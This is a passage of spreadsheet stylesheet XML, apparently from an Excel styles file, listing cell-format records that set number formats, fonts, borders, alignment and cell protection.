      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="180" fontId="3" fillId="0" borderId="0" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="0" xfId="12" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="16" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="0" borderId="1" xfId="12" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="14" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="180" fontId="10" fillId="0" borderId="0" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="180" fontId="13" fillId="0" borderId="0" xfId="14" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="180" fontId="13" fillId="0" borderId="0" xfId="14" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="14" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="45" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="181" fontId="18" fillId="0" borderId="0" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="180" fontId="18" fillId="0" borderId="0" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="18" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="0" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="20" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="13" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="182" fontId="13" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="13" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="1" applyFont="1"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vertical="center"/>
    </xf>
    <xf numFmtId="182" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="183" fontId="2" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="180" fontId="2" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="10" fontId="2" fillId="0" borderId="1" xfId="4"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177" fontId="3" fillId="0" borderId="0" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="18" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="0" borderId="0" xfId="18" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="19" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="22" fillId="0" borderId="1" xfId="20" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="22" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="43" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="1" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="3" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="1" xfId="2" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="2" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="6" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="48" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="48" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="48" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="43" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="35" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="48" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="1" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="1" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="26" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="16" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="16" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="10" xfId="16" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="28" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="11" xfId="16" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" xfId="16" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="13" xfId="16" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="16" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="13" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="8" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="8" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="8" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="16" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="8" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="8" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="37" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="2" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="0" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="6" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="14" xfId="16" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="15" xfId="16" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="1" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="1" xfId="43" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="37" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
